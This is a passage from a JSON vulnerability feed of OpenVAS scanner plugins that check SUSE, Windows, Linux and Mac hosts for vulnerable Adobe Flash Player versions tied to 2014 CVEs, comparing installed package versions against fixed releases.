script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.346~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.346~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.346~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-07-19T22:14:28", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.", "cvss3": {}, "published": "2014-03-20T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804514", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804514", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; 
you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804514\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_bugtraq_id(66122, 66127);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 09:57:50 +0530 (Thu, 20 Mar 2014)\");\n script_name(\"Adobe Flash Player Multiple Security Bypass Vulnerabilities - 01 Feb14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nsecurity bypass vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw are due to multiple unspecified errors.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to bypass certain security\nrestrictions and disclose potentially sensitive information.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.272 
and 11.8.x through 12.0.x\nbefore 12.0.0.77 on Windows\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.272 or 12.0.0.77 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/57271\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.272\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"12.0.0.76\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2017-12-12T11:10:26", "description": "Check for the Version of flash-player", "cvss3": {}, "published": "2014-03-17T00:00:00", "type": "openvas", "title": "SuSE Update for flash-player openSUSE-SU-2014:0379-1 (flash-player)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:850576", "href": "http://plugins.openvas.org/nasl.php?oid=850576", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0379_1.nasl 8044 2017-12-08 08:32:49Z santu $\n#\n# SuSE Update for flash-player openSUSE-SU-2014:0379-1 (flash-player)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# 
Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850576);\n script_version(\"$Revision: 8044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:32:49 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-17 13:34:20 +0530 (Mon, 17 Mar 2014)\");\n script_cve_id(\"CVE-2014-0503\", \"CVE-2014-0504\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_name(\"SuSE Update for flash-player openSUSE-SU-2014:0379-1 (flash-player)\");\n\n tag_insight = \"\n Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n CVE-2014-0503: A vulnerability that could be used to bypass\n the same origin policy was fixed.\n\n CVE-2014-0504: A vulnerability that could be used to read\n the contents of the clipboard was fixed.\n\n More information can be found on:\n http://helpx.adobe.com/security/products/flash-player/apsb14-08.html\";\n\n tag_affected = \"flash-player on openSUSE 11.4\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : 
tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"openSUSE-SU\", value: \"2014:0379_1\");\n script_summary(\"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.346~99.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.346~99.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.346~99.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-04-22T17:03:10", "description": "This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "openvas", "title": "Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2020-04-20T00:00:00", "id": "OPENVAS:1361412562310804561", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310804561", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Linux)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804561\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-29 11:45:09 +0530 (Tue, 29 Apr 2014)\");\n script_name(\"Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable 
version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to an improper validation of user-supplied input to the pixel\nbender component.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code and\ncause a buffer overflow, resulting in a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.2.202.356 on Linux\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.2.202.356 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=2577\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/blog/8212\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.356\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.356\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:00", "description": "The remote host is missing an update for the 'flash-player' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2014:0605-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2020-01-31T00:00:00", 
"id": "OPENVAS:1361412562310850874", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850874", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850874\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:20:57 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-0515\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2014:0605-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This flash-player 
update to version 11.2.202.356 fixes the\n following critical security issue:\n\n * bnc#875577: buffer overflow vulnerability that leads\n to arbitrary code execution (CVE-2014-0515)\n\n Adobe Security Bulletin (APSB14-13)\");\n\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0605-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.356~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.356~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.356~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:39:11", "description": "The remote host is missing an update for the 'update' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2014-05-05T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory 
for update (openSUSE-SU-2014:0589-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850584", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850584\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-05 11:21:18 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-0515\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for update (openSUSE-SU-2014:0589-1)\");\n\n script_tag(name:\"affected\", value:\"update on openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"This flash-player update fixes a critical buffer overflow\n vulnerability that leads to arbitrary code execution.\n\n The 
flash-player package was updated to version\n 11.2.202.356.\n\n * bnc#875577, APSB14-13, CVE-2014-0515\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0589-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.356~107.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.356~107.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.356~107.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:13", "description": "This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": 
"openvas", "title": "Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804560", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804560", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804560\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-29 12:04:33 +0530 (Tue, 29 Apr 2014)\");\n script_name(\"Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to an improper validation of user-supplied input to the pixel\nbender component.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code and\ncause a buffer overflow, resulting in a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.279 and 11.8.x through 13.0.x\nbefore 13.0.0.206 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Flash Player version 11.7.700.279 or 13.0.0.206 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", 
value:\"http://secpod.org/blog/?p=2577\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/blog/8212\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.279\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"13.0.0.205\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:21", "description": "This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "openvas", "title": "Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310804559", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804559", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Windows)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later 
version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804559\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0515\");\n script_bugtraq_id(67092);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-29 11:45:09 +0530 (Tue, 29 Apr 2014)\");\n script_name(\"Adobe Flash Player Buffer Overflow Vulnerability - Apr14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to buffer\noverflow vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaw is due to an improper validation of user-supplied input to the pixel\nbender component.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to execute arbitrary code and\ncause a buffer overflow, resulting in a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before 11.7.700.279 and 11.8.x through 13.0.x\nbefore 13.0.0.206 on Windows\");\n script_tag(name:\"solution\", value:\"Update to 
Adobe Flash Player version 11.7.700.279 or 13.0.0.206 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=2577\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/blog/8212\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-13.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.7.700.279\") ||\n version_in_range(version:playerVer, test_version:\"11.8.0\", test_version2:\"13.0.0.205\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-12T11:10:22", "description": "Check for the Version of update", "cvss3": {}, "published": "2014-05-05T00:00:00", "type": "openvas", "title": "SuSE Update for update openSUSE-SU-2014:0589-1 (update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:850584", "href": "http://plugins.openvas.org/nasl.php?oid=850584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0589_1.nasl 8044 2017-12-08 08:32:49Z santu $\n#\n# SuSE Update for update openSUSE-SU-2014:0589-1 (update)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This 
